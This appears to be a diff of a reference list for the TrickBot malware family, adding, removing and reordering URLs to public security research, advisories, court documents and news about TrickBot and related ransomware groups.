- "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/",
- "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/",
- "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
- "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
- "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
- "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
- "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/",
- "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
- "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages",
- "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
- "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/",
- "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
- "https://www.joesecurity.org/blog/498839998833561473",
- "https://intel471.com/blog/conti-leaks-ransomware-development",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html",
- "https://cofenselabs.com/all-you-need-is-text-second-wave/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/VK_Intel/status/1328578336021483522",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
- "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
- "https://www.youtube.com/watch?v=EdchPEHnohw",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
- "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
- "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez",
- "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://duo.com/decipher/trickbot-up-to-its-old-tricks",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
- "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis",
- "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html",
- "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/",
- "https://labs.vipre.com/trickbots-tricks/",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/",
+ "https://home.treasury.gov/news/press-releases/jy1256",
+ "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
"https://www.youtube.com/watch?v=KMcSAlS9zGE",
- "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
- "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
- "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf",
- "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
- "https://www.youtube.com/watch?v=Brx4cygfmg8",
+ "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
+ "https://labs.vipre.com/trickbots-tricks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html",
- "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal",
- "https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/",
- "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/",
- "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
- "https://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
- "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
- "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
- "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/",
+ "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-076a",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor",
- "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
- "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
- "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://securelist.com/trickbot-module-descriptions/104603/",
+ "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
+ "https://community.riskiq.com/article/04ec92f4",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/",
+ "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/",
- "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html",
- "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
- "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
- "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/",
- "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/",
- "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
- "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/",
- "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
- "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://community.riskiq.com/article/111d6005/description",
"https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works",
- "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737",
- "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.justice.gov/opa/press-release/file/1445241/download",
- "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/",
- "http://www.malware-traffic-analysis.net/2018/02/01/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://community.riskiq.com/article/298c9fc9",
- "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/",
- "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html",
- "https://intel471.com/blog/privateloader-malware",
- "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
"https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/",
+ "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure",
+ "https://www.youtube.com/watch?v=EdchPEHnohw",
+ "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/",
+ "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/",
+ "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
"https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.youtube.com/watch?v=lTywPmZEU1A",
- "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/",
+ "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/",
+ "https://cofenselabs.com/all-you-need-is-text-second-wave/",
+ "https://www.secdata.com/the-trickbot-and-mikrotik/",
+ "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
+ "https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/",
"https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/",
- "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
- "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/",
+ "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/",
+ "https://www.wired.com/story/trickbot-malware-group-internal-messages/",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis",
+ "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
+ "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
+ "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
+ "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://osint.fans/service-nsw-russia-association",
+ "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html",
+ "https://securelist.com/trickbot-module-descriptions/104603/",
+ "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
+ "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
+ "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
+ "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
+ "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.cert.pl/en/news/single/detricking-trickbot-loader/",
+ "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users",
+ "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
+ "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/",
+ "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html",
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "http://www.malware-traffic-analysis.net/2018/02/01/",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/",
+ "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf",
+ "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet",
+ "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.ic3.gov/Media/News/2022/220120.pdf",
+ "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows",
+ "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html",
+ "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/",
+ "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://blog.talosintelligence.com/2020/03/trickbot-primer.html",
+ "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
+ "https://community.riskiq.com/article/298c9fc9",
+ "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
+ "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass",
+ "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
+ "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor",
+ "https://www.mandiant.com/media/12596/download",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.joesecurity.org/blog/498839998833561473",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
+ "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
+ "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/",
+ "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
+ "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
+ "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf",
